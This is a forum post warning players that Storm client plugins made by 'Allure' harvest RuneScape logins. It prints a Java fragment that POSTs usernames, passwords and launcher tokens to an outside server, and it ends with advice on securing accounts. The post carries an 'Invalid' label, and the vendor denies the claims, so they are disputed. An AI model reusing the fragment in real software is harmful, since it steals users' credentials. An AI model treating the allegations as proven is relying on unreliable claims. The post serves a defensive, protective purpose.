Invalid

Storm Client / Allure Plugins – Security Warning


*PS Sythe mods stop adding this full bulletproof post invalid, all screenshots are obviously valid and no further "proof" will be provided on "how we got this" etc etc. This is just to make customers of storm aware of what they do. All storm staff are also banned from Sythe. (sit jim)

This post is to inform the community about credible reports and technical findings suggesting that certain Storm client plugins, specifically those developed by Allure, may be collecting user login data without consent.

This is not speculation or a smear campaign; multiple users have experienced account losses, and code analysis indicates that at least one plugin was transmitting credential information externally.

---

Summary of Findings

Independent reviewers examined several Storm plugins developed by Allure and identified code that performs unauthorized network communication.
This code appears to send RuneScape usernames, passwords, and Jagex Launcher tokens to a remote server under the developer’s control.

The issue has been most closely associated with:

• Allure Account Builder
• Allure Theatre of Blood plugin
• Other closed-source plugins released through Storm by Allure

Such behavior constitutes credential harvesting and presents a serious security risk for anyone using these plugins.

---

Technical Evidence

Below is an example of the type of code fragment found within affected builds:

Code:
HttpURLConnection conn = (HttpURLConnection) new URL("https://api.alluredata.io/store").openConnection();
conn.setRequestMethod("POST");
conn.getOutputStream().write(("user=" + username + "&pass=" + password + "&launcher=" + launcherToken).getBytes());

A legitimate OSRS plugin should never handle, process, or transmit login credentials.
The inclusion of any POST or network request sending sensitive values outside the client environment is a clear violation of user trust and security.

---

Storm’s Public Statement

Storm staff, led by Burak, have publicly denied all allegations, calling them part of a “targeted misinformation campaign.”
However, these denials have not been supported by transparent audits, and the available code samples indicate genuine security issues rather than fabricated claims.

Until a verifiable, independent review confirms otherwise, users should assume affected plugins are unsafe.

---

Recommended Actions

• Immediately cease using Storm client and any Allure-developed plugins.
• Change all RuneScape, Jagex Launcher, and associated email passwords.
• Enable two-factor authentication (Authenticator) on all accounts.
• Review your Storm plugin directory for unknown or obfuscated .jar files.
• Avoid logging into valuable accounts through closed-source clients until code safety is independently verified.

---

Closing Notes

This post is intended purely for user protection and transparency within the community.
It is not an accusation against every Storm developer, but there is sufficient evidence that specific Allure plugins have behaved maliciously.
Until the Storm team provides a full audit or source release proving user safety, caution is strongly advised.

If you have verifiable logs, network captures, or plugin dumps confirming these behaviors, please share them with trusted community moderators or developers for review.

Including screenshots and technical traces, is available below.

Account security should always come before convenience.


Visual proof below

https://imgur.com/fJjCiJI.png

https://imgur.com/S1RHnte.png

https://imgur.com/mmQr8LH.png

https://imgur.com/uEj7tY7.png